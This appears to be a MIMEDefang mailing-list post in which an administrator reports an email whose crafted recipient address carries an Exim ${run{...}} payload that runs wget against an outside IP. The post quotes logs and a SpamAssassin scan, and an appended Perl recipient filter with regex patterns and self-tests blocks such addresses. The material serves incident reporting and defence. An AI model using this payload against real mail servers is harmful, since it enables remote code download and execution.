Hoping someone can assist me with this...

I just came across an email processed by MIMEDefang that seems to have had a specially crafted recipient. It seems as if the crafted recipient managed to coerce either my mimedefang-filter or MIMEDefang itself to actually execute a script. The recipient was recorded as:

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>

which looks as if it tried to execute /bin/sh -c "wget 65.181.120.163/stfinracu", with at least some partial success, because the .INPUTMSG file resulted in:

Received: 1
Received: 2
Received: 3
...
...
Received: 31

A SpamAssassin scan of this file then yielded:

1.2 MISSING_HEADERS        Missing To: header
1.8 MISSING_SUBJECT        Missing Subject: header
2.3 EMPTY_MESSAGE          Message appears to have no textual parts and no Subject: text
1.0 MISSING_FROM           Missing From: header
0.0 MSGID_FROM_MTA_HEADER  Message-Id was added by a relay
1.4 MISSING_DATE           Missing Date: header

which seems to indicate that this lot happened before SpamAssassin ran in filter_end.

My logfile indicated the following:

Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=<[email protected]>, size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747@--->, proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG REPLYTO=, SENDER=<[email protected]>, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject : x5PJLcKV004747 :  : 2 : 7.715 : 0.85136 : <[email protected]> : <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server> : 34.228.4.69 : 395
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding because filter instructed us to
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded

I would very much like to hear the community's opinion on this and how I can protect against this?

Thanks in advance!
Stefan
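The `${run{...}}` construct and `\xNN` escapes in that recipient are Exim string-expansion syntax. One way to refuse such local parts at RCPT time, before any .INPUTMSG is written, is a filter_recipient hook in mimedefang-filter. The following is an added example, not code from the post or from the MIMEDefang project; it assumes MIMEDefang is started with -r (so filter_recipient is called), uses MIMEDefang's md_syslog for logging, and the pattern list and the clean test addresses are constructed.

```perl
use strict;
use warnings;

# Patterns that have no business in a legitimate local part (constructed
# list, not from the post): each entry is a regex plus a short label.
my @RCPT_EXPANSION_PATTERNS = (
    [ qr/\$\{\s*run\s*\{/i, 'exim-run-expansion' ],
    [ qr/\\x[0-9a-f]{2}/i,  'hex-escape'         ],
    [ qr/\$\{[^}]*\}/,      'dollar-brace'       ],
);

# Return the label of the first matching pattern, or undef if the local
# part looks clean. Angle brackets and the domain part are ignored.
sub suspicious_recipient_reason {
    my ($recipient) = @_;
    my ($local) = $recipient =~ /^<?([^@]*)/;
    for my $p (@RCPT_EXPANSION_PATTERNS) {
        my ($re, $label) = @$p;
        return $label if $local =~ $re;
    }
    return undef;
}

# MIMEDefang hook: called for every RCPT TO when mimedefang runs with -r.
# Rejecting here happens before DATA, so no .INPUTMSG is ever written.
sub filter_recipient {
    my ($recipient, $sender, $ip, $hostname, $first, $helo,
        $rcpt_mailer, $rcpt_host, $rcpt_addr) = @_;
    my $why = suspicious_recipient_reason($recipient);
    if (defined $why) {
        md_syslog('warning', "rejected recipient from $ip ($why): $recipient");
        return ('REJECT', 'Recipient address not accepted');
    }
    return ('CONTINUE', 'ok');
}

# Stand-alone self-check: first address is the one quoted in the post.
unless (caller) {
    my @cases = (
        ['<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>',
         'exim-run-expansion'],
        ['<bob@example.com>',              undef],
        ['<alice+newsletter@example.org>', undef],
    );
    for my $c (@cases) {
        my $got = suspicious_recipient_reason($c->[0]);
        printf "%-4s %s\n", (($got // '') eq ($c->[1] // '')) ? 'ok' : 'FAIL', $c->[0];
    }
}
```

Running the file directly with perl exercises the check on the constructed cases; pasted into mimedefang-filter, only the two subs and the pattern list are needed.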


Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list [email protected]
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang